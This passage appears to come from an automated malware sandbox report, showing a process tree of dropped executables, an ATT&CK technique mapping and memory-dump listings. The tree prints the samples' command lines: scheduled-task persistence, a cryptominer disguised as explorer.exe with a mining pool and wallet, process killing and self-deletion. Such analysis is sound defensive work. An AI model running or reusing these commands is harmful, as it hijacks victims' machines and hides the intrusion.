  - Executes dropped EXE
  - Loads dropped DLL
  PID:2748
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:2068
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:2208
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:2400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:1100
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:3012
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        Executes dropped EXE
        
        PID:2552
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        5⤵
        
        PID:2176
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:3052
  - - C:\ProgramData\8641602.exe
      "C:\ProgramData\8641602.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: SetClipboardViewer
      PID:2424
  - - C:\ProgramData\8670989.exe
      "C:\ProgramData\8670989.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2724
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2724 -s 1748
        5⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:316
  - - C:\ProgramData\6321092.exe
      "C:\ProgramData\6321092.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:2512
    - - C:\ProgramData\6321092.exe
        
        "C:\ProgramData\6321092.exe"
        5⤵
        Executes dropped EXE
        
        PID:1580
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 712
        5⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2012
  - - C:\ProgramData\1797623.exe
      "C:\ProgramData\1797623.exe"
      4⤵
      Executes dropped EXE
      PID:2220
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2076
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      Executes dropped EXE
      PID:2996
    - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3040
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1120
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
      4⤵
      PID:344
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
- - C:\Users\Admin\AppData\Local\Temp\udptest.exe
    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
    3⤵
    - Executes dropped EXE
    PID:1064
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2164
  - - C:\Users\Admin\AppData\Local\Temp\is-PV6QE.tmp\setup_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-PV6QE.tmp\setup_2.tmp" /SL5="$1016A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
      4⤵
      Executes dropped EXE
      PID:2276
    - - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        5⤵
        Executes dropped EXE
        
        PID:1872
      - C:\Users\Admin\AppData\Local\Temp\is-0RQCL.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0RQCL.tmp\setup_2.tmp" /SL5="$2016C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2108
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    3⤵
    - Executes dropped EXE
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\3002.exe
      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
      4⤵
      Executes dropped EXE
      PID:980
- - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    3⤵
    - Executes dropped EXE
    PID:920
- - C:\Users\Admin\AppData\Local\Temp\8.exe
    "C:\Users\Admin\AppData\Local\Temp\8.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1716 -s 1396
      4⤵
      Program crash
      Suspicious behavior: GetForegroundWindowSpam
      PID:2516
- - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    3⤵
    - Executes dropped EXE
    PID:2636

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun150faeb3537d.exe
Sun150faeb3537d.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:2376

C:\Users\Admin\AppData\Local\Temp\7zS8663E374\Sun15d8dfe2c6d17.exe
Sun15d8dfe2c6d17.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1872

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2600
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:2620

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2944
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2124

C:\Users\Admin\AppData\Local\Temp\7EA2.exe
C:\Users\Admin\AppData\Local\Temp\7EA2.exe
1⤵
- Executes dropped EXE
PID:2852

C:\Users\Admin\AppData\Local\Temp\3238.exe
C:\Users\Admin\AppData\Local\Temp\3238.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3238.exe"
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:2396
- C:\Users\Admin\AppData\Local\Temp\7NGb9RsmCw.exe
  "C:\Users\Admin\AppData\Local\Temp\7NGb9RsmCw.exe"
  2⤵
  - Executes dropped EXE
  PID:1820
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1004

C:\Windows\system32\taskeng.exe
taskeng.exe {A5EF2784-AB3C-414D-BC63-A6013AB91EAB} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]
1⤵
PID:1676
- C:\Users\Admin\AppData\Roaming\ishsbjf
  C:\Users\Admin\AppData\Roaming\ishsbjf
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:336
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  2⤵
  - Executes dropped EXE
  PID:1392
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1868
- C:\Users\Admin\AppData\Roaming\ishsbjf
  C:\Users\Admin\AppData\Roaming\ishsbjf
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1564
- C:\Users\Admin\AppData\Roaming\ishsbjf
  C:\Users\Admin\AppData\Roaming\ishsbjf
  2⤵
  - Executes dropped EXE
  PID:2528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-335-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/584-175-0x0000000001EF0000-0x0000000001EF1000-memory.dmp

Filesize
4KB

Download
memory/584-178-0x0000000001EF1000-0x0000000001EF2000-memory.dmp

Filesize
4KB

Download
memory/584-179-0x0000000001EF2000-0x0000000001EF4000-memory.dmp

Filesize
8KB

Download
memory/752-221-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download
memory/752-225-0x00000000004A0000-0x00000000004BB000-memory.dmp

Filesize
108KB

Download
memory/752-233-0x00000000004D0000-0x00000000004D1000-memory.dmp

Filesize
4KB

Download
memory/772-183-0x0000000000400000-0x00000000017F4000-memory.dmp

Filesize
20.0MB

Download
memory/772-182-0x0000000003170000-0x0000000003241000-memory.dmp

Filesize
836KB

Download
memory/1064-290-0x0000000005C81000-0x0000000005C82000-memory.dmp

Filesize
4KB

Download
memory/1064-294-0x0000000005C82000-0x0000000005C83000-memory.dmp

Filesize
4KB

Download
memory/1064-296-0x0000000005C83000-0x0000000005C84000-memory.dmp

Filesize
4KB

Download
memory/1064-303-0x0000000005C84000-0x0000000005C86000-memory.dmp

Filesize
8KB

Download
memory/1064-287-0x00000000001E0000-0x0000000000210000-memory.dmp

Filesize
192KB

Download
memory/1064-289-0x0000000000400000-0x000000000179A000-memory.dmp

Filesize
19.6MB

Download
memory/1120-262-0x00000000002E0000-0x000000000030F000-memory.dmp

Filesize
188KB

Download
memory/1120-275-0x0000000000400000-0x0000000002B5D000-memory.dmp

Filesize
39.4MB

Download
memory/1296-187-0x0000000002BE0000-0x0000000002BF5000-memory.dmp

Filesize
84KB

Download
memory/1296-326-0x000007FEEE7D0000-0x000007FEEE913000-memory.dmp

Filesize
1.3MB

Download
memory/1296-327-0x000007FF27000000-0x000007FF2700A000-memory.dmp

Filesize
40KB

Download
memory/1408-176-0x0000000000240000-0x0000000000249000-memory.dmp

Filesize
36KB

Download
memory/1408-177-0x0000000000400000-0x000000000178A000-memory.dmp

Filesize
19.5MB

Download
memory/1524-180-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1524-181-0x0000000000150000-0x000000000016C000-memory.dmp

Filesize
112KB

Download
memory/1524-184-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/1524-186-0x0000000000650000-0x0000000000652000-memory.dmp

Filesize
8KB

Download
memory/1524-166-0x0000000000960000-0x0000000000961000-memory.dmp

Filesize
4KB

Download
memory/1580-311-0x0000000004C40000-0x0000000004C41000-memory.dmp

Filesize
4KB

Download
memory/1656-53-0x0000000075561000-0x0000000075563000-memory.dmp

Filesize
8KB

Download
memory/1716-258-0x0000000000F60000-0x0000000000F62000-memory.dmp

Filesize
8KB

Download
memory/1732-185-0x000000001AB10000-0x000000001AB12000-memory.dmp

Filesize
8KB

Download
memory/1732-165-0x00000000000D0000-0x00000000000D1000-memory.dmp

Filesize
4KB

Download
memory/1788-110-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1788-99-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1788-143-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1788-84-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1788-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1788-102-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1788-119-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1788-128-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1788-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1788-96-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1820-360-0x0000000000220000-0x0000000000224000-memory.dmp

Filesize
16KB

Download
memory/1872-263-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2012-329-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/2076-218-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/2076-231-0x000000001B240000-0x000000001B242000-memory.dmp

Filesize
8KB

Download
memory/2108-174-0x0000000000400000-0x0000000002B6B000-memory.dmp

Filesize
39.4MB

Download
memory/2108-167-0x0000000000240000-0x0000000000288000-memory.dmp

Filesize
288KB

Download
memory/2108-277-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2164-244-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2176-346-0x0000000140000000-0x0000000140763000-memory.dmp

Filesize
7.4MB

Download
memory/2176-347-0x0000000001FD0000-0x0000000001FF0000-memory.dmp

Filesize
128KB

Download
memory/2204-357-0x0000000000400000-0x00000000017C9000-memory.dmp

Filesize
19.8MB

Download
memory/2204-356-0x0000000000320000-0x00000000003B0000-memory.dmp

Filesize
576KB

Download
memory/2276-255-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/2400-337-0x00000000008B0000-0x00000000008B2000-memory.dmp

Filesize
8KB

Download
memory/2424-279-0x0000000004E20000-0x0000000004E21000-memory.dmp

Filesize
4KB

Download
memory/2512-284-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/2516-328-0x0000000001C20000-0x0000000001C21000-memory.dmp

Filesize
4KB

Download
memory/2552-341-0x000000001BCA0000-0x000000001BCA2000-memory.dmp

Filesize
8KB

Download
memory/2580-334-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

Filesize
4KB

Download
memory/2600-343-0x0000000000270000-0x00000000002CB000-memory.dmp

Filesize
364KB

Download
memory/2724-280-0x000000001AF40000-0x000000001AF42000-memory.dmp

Filesize
8KB

Download
memory/2748-195-0x0000000001250000-0x0000000001251000-memory.dmp

Filesize
4KB

Download
memory/2760-200-0x0000000000710000-0x000000000072E000-memory.dmp

Filesize
120KB

Download
memory/2760-234-0x000000001AF10000-0x000000001AF12000-memory.dmp

Filesize
8KB

Download
memory/2760-193-0x0000000000840000-0x0000000000841000-memory.dmp

Filesize
4KB

Download
memory/2824-199-0x00000000012C0000-0x00000000012C1000-memory.dmp

Filesize
4KB

Download
memory/2824-204-0x0000000000320000-0x0000000000324000-memory.dmp

Filesize
16KB

Download
memory/2852-349-0x0000000000400000-0x000000000179C000-memory.dmp

Filesize
19.6MB

Download
memory/2852-348-0x0000000000230000-0x0000000000260000-memory.dmp

Filesize
192KB

Download
memory/2852-354-0x0000000005B33000-0x0000000005B34000-memory.dmp

Filesize
4KB

Download
memory/2852-353-0x0000000005B32000-0x0000000005B33000-memory.dmp

Filesize
4KB

Download
memory/2852-352-0x0000000005B31000-0x0000000005B32000-memory.dmp

Filesize
4KB

Download
memory/2960-235-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/2960-209-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/2996-297-0x0000000003AA0000-0x00000000043BE000-memory.dmp

Filesize
9.1MB

Download
memory/2996-298-0x0000000000400000-0x0000000001BB7000-memory.dmp

Filesize
23.7MB

Download
memory/3008-214-0x000000013F970000-0x000000013F971000-memory.dmp

Filesize
4KB

Download
memory/3008-319-0x00000000008A0000-0x00000000008A2000-memory.dmp

Filesize
8KB

Download
memory/3040-358-0x0000000000400000-0x0000000001BB7000-memory.dmp

Filesize
23.7MB

Download
memory/3052-226-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/3052-237-0x000000001ADF0000-0x000000001ADF2000-memory.dmp

Filesize
8KB

Download
memory/3052-222-0x0000000000960000-0x0000000000961000-memory.dmp

Filesize
4KB

Download
memory/3052-229-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/3052-227-0x00000000003E0000-0x00000000003FA000-memory.dmp

Filesize
104KB

Download